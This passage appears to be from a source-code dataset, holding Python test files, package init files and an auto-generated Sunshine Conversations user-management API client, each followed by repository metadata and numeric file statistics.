ntlm_strict_mode=True
)
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpNtlmAdapter)
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpProxyAdapter)
self.assertIsInstance(adapter, requests.adapters.HTTPAdapter)
mock_setup.assert_called_once_with("username", "password", 3, True)
mock_teardown.assert_not_called()
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def close(self, mock_setup, mock_teardown):
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
self.assertIsNone(adapter.close())
mock_setup.assert_called_once_with("username", "password", 3)
mock_teardown.assert_called_once()
@mock.patch("requests_ntlm2.connection.HTTPSConnection.set_ntlm_auth_credentials")
def test__setup(self, mock_set_ntlm_auth_credentials):
from requests.packages.urllib3.poolmanager import pool_classes_by_scheme
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
mock_set_ntlm_auth_credentials.assert_called_once_with("username", "password")
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, requests_ntlm2.connection.HTTPConnection)
self.assertTrue(https_conn_cls, requests_ntlm2.connection.HTTPSConnection)
adapter.close()
@mock.patch("requests_ntlm2.connection.HTTPSConnection.clear_ntlm_auth_credentials")
@mock.patch("requests_ntlm2.connection.HTTPSConnection.set_ntlm_auth_credentials")
def test_close(self, set_ntlm_auth_credentials, clear_ntlm_auth_credentials):
from requests.packages.urllib3.poolmanager import pool_classes_by_scheme
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username2", "password")
set_ntlm_auth_credentials.assert_called_once_with("username2", "password")
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, requests_ntlm2.connection.HTTPConnection)
self.assertTrue(https_conn_cls, requests_ntlm2.connection.HTTPSConnection)
adapter.close()
clear_ntlm_auth_credentials.assert_called_once()
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, HTTPConnection)
self.assertTrue(https_conn_cls, HTTPSConnection)
| 46.699346
| 88
| 0.729321
| 793
| 7,145
| 6.278689
| 0.103405
| 0.083551
| 0.101225
| 0.089978
| 0.850171
| 0.833099
| 0.806186
| 0.775256
| 0.746937
| 0.728861
| 0
| 0.015897
| 0.163611
| 7,145
| 152
| 89
| 47.006579
| 0.817269
| 0
| 0
| 0.579365
| 0
| 0
| 0.158432
| 0.076277
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.087302
| false
| 0.079365
| 0.071429
| 0
| 0.174603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
10d8fc5df2c715c8fe51c550b827f5348c36baa3
| 143
|
py
|
Python
|
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
from .test_cluster import *
from .test_formset import *
from .test_serialize import *
from .test_cluster_form import *
from .test_tag import *
| 23.833333
| 32
| 0.79021
| 21
| 143
| 5.095238
| 0.380952
| 0.373832
| 0.523364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13986
| 143
| 5
| 33
| 28.6
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8014e03f4dd1dd0fa4c2c0cc7a2031dc3214bc57
| 147
|
py
|
Python
|
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | 96
|
2015-01-06T05:32:49.000Z
|
2022-03-29T01:02:41.000Z
|
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | 21
|
2015-01-11T19:12:08.000Z
|
2021-08-24T11:35:35.000Z
|
#! ../env/bin/python
# -*- coding: utf-8 -*-
from mypackage import myapp
def test_sayhello():
assert myapp.say_hello('Kiran') == 'Hello Kiran'
| 24.5
| 52
| 0.659864
| 20
| 147
| 4.75
| 0.85
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.14966
| 147
| 6
| 52
| 24.5
| 0.752
| 0.278912
| 0
| 0
| 0
| 0
| 0.152381
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
33dfded66f6f6ed12c10687161b04860c3c771dc
| 372
|
py
|
Python
|
oembed/tests/tests/__init__.py
|
EightMedia/djangoembed
|
ee325f7375c48405f9c3e7e2c0fa7f5a08fafd48
|
[
"MIT"
] | 8
|
2015-02-06T19:18:49.000Z
|
2021-01-01T05:46:02.000Z
|
oembed/tests/tests/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | null | null | null |
oembed/tests/tests/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | 5
|
2015-03-15T11:41:26.000Z
|
2018-03-08T09:45:26.000Z
|
from oembed.tests.tests.consumer import *
from oembed.tests.tests.models import *
from oembed.tests.tests.parsers import *
from oembed.tests.tests.providers import *
from oembed.tests.tests.resources import *
from oembed.tests.tests.sites import *
from oembed.tests.tests.templatetags import *
from oembed.tests.tests.utils import *
from oembed.tests.tests.views import *
| 37.2
| 45
| 0.806452
| 54
| 372
| 5.555556
| 0.240741
| 0.3
| 0.45
| 0.6
| 0.693333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 372
| 9
| 46
| 41.333333
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d502d402ceafa28f5aaed6414263f508a7671f36
| 32,725
|
py
|
Python
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 4
|
2020-09-27T14:28:25.000Z
|
2022-02-02T13:51:29.000Z
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 3
|
2021-09-30T18:18:58.000Z
|
2021-12-04T07:55:23.000Z
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 5
|
2020-11-07T02:08:18.000Z
|
2021-12-07T17:10:23.000Z
|
# coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user(self, app_id, user_create_body, **kwargs): # noqa: E501
"""Create User # noqa: E501
Creates a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(app_id, user_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param UserCreateBody user_create_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_user_with_http_info(app_id, user_create_body, **kwargs) # noqa: E501
def create_user_with_http_info(self, app_id, user_create_body, **kwargs): # noqa: E501
"""Create User # noqa: E501
Creates a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_with_http_info(app_id, user_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param UserCreateBody user_create_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'user_create_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `create_user`") # noqa: E501
# verify the required parameter 'user_create_body' is set
if self.api_client.client_side_validation and ('user_create_body' not in local_var_params or # noqa: E501
local_var_params['user_create_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_create_body` when calling `create_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_create_body' in local_var_params:
body_params = local_var_params['user_create_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User # noqa: E501
Delete a user, its clients and its conversation history. The user is considered completely deleted once the `user:delete` webhook is fired. To only delete a user’s personal information, see [Delete User Personal Information](#operation/deleteUserPersonalInformation). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
def delete_user_with_http_info(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User # noqa: E501
Delete a user, its clients and its conversation history. The user is considered completely deleted once the `user:delete` webhook is fired. To only delete a user’s personal information, see [Delete User Personal Information](#operation/deleteUserPersonalInformation). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_with_http_info(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'user_id_or_external_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `delete_user`") # noqa: E501
# verify the required parameter 'user_id_or_external_id' is set
if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or # noqa: E501
local_var_params['user_id_or_external_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `delete_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'user_id_or_external_id' in local_var_params:
path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/users/{userIdOrExternalId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user_personal_information(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User Personal Information # noqa: E501
Delete a user’s personal information. Calling this API will clear `givenName`, `surname`, `email` and `avatarUrl` and every custom property for the specified user. For every client owned by the user, it will also clear `displayName`, `avatarUrl` and any channel specific information stored in the info and raw fields. Calling this API doesn’t delete the user’s conversation history. To fully delete the user, see [Delete User](#operation/deleteUser). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_personal_information(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_personal_information_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
def delete_user_personal_information_with_http_info(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User Personal Information # noqa: E501
Delete a user’s personal information. Calling this API will clear `givenName`, `surname`, `email` and `avatarUrl` and every custom property for the specified user. For every client owned by the user, it will also clear `displayName`, `avatarUrl` and any channel specific information stored in the info and raw fields. Calling this API doesn’t delete the user’s conversation history. To fully delete the user, see [Delete User](#operation/deleteUser). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_personal_information_with_http_info(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'user_id_or_external_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user_personal_information" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `delete_user_personal_information`") # noqa: E501
# verify the required parameter 'user_id_or_external_id' is set
if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or # noqa: E501
local_var_params['user_id_or_external_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `delete_user_personal_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'user_id_or_external_id' in local_var_params:
path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/users/{userIdOrExternalId}/personalinformation', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Get User # noqa: E501
Fetches an individual user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
def get_user_with_http_info(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Get User # noqa: E501
Fetches an individual user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_with_http_info(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'user_id_or_external_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `get_user`") # noqa: E501
# verify the required parameter 'user_id_or_external_id' is set
if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or # noqa: E501
local_var_params['user_id_or_external_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `get_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'user_id_or_external_id' in local_var_params:
path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/users/{userIdOrExternalId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user(self, app_id, user_id_or_external_id, user_update_body, **kwargs): # noqa: E501
"""Update User # noqa: E501
Updates a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user(app_id, user_id_or_external_id, user_update_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param UserUpdateBody user_update_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_user_with_http_info(app_id, user_id_or_external_id, user_update_body, **kwargs) # noqa: E501
def update_user_with_http_info(self, app_id, user_id_or_external_id, user_update_body, **kwargs): # noqa: E501
"""Update User # noqa: E501
Updates a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_with_http_info(app_id, user_id_or_external_id, user_update_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param UserUpdateBody user_update_body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id',
'user_id_or_external_id',
'user_update_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `update_user`") # noqa: E501
# verify the required parameter 'user_id_or_external_id' is set
if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or # noqa: E501
local_var_params['user_id_or_external_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `update_user`") # noqa: E501
# verify the required parameter 'user_update_body' is set
if self.api_client.client_side_validation and ('user_update_body' not in local_var_params or # noqa: E501
local_var_params['user_update_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_update_body` when calling `update_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
if 'user_id_or_external_id' in local_var_params:
path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_update_body' in local_var_params:
body_params = local_var_params['user_update_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/users/{userIdOrExternalId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.989521
| 472
| 0.61097
| 3,843
| 32,725
| 4.916992
| 0.059329
| 0.04276
| 0.062235
| 0.047417
| 0.96539
| 0.962743
| 0.957663
| 0.95634
| 0.95253
| 0.950307
| 0
| 0.014746
| 0.31615
| 32,725
| 667
| 473
| 49.062969
| 0.829617
| 0.447976
| 0
| 0.733746
| 1
| 0
| 0.2074
| 0.072642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034056
| false
| 0
| 0.01548
| 0
| 0.083591
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d50529107f691c4a0a8a7180286443b0b393b797
| 9,777
|
py
|
Python
|
hadiths/tests/tests_hadithtagapi.py
|
rafidka/HadithHouseApi
|
207a9a35b820a7eebeb5f6e869cbc16e44e9d721
|
[
"MIT"
] | 1
|
2016-01-26T00:01:14.000Z
|
2016-01-26T00:01:14.000Z
|
hadiths/tests/tests_hadithtagapi.py
|
rafidka/HadithHouseApi
|
207a9a35b820a7eebeb5f6e869cbc16e44e9d721
|
[
"MIT"
] | 190
|
2015-11-12T20:54:31.000Z
|
2018-02-04T21:37:18.000Z
|
hadiths/tests/tests_hadithtagapi.py
|
hadithhouse/HadithHouseWebsite
|
3b59c42356262ee2a848e1e2251d5c51b4a669d1
|
[
"MIT"
] | 3
|
2016-02-24T20:22:26.000Z
|
2017-02-01T23:04:18.000Z
|
from django.test import Client
from rest_framework.status import HTTP_403_FORBIDDEN, HTTP_400_BAD_REQUEST, HTTP_200_OK, HTTP_201_CREATED, \
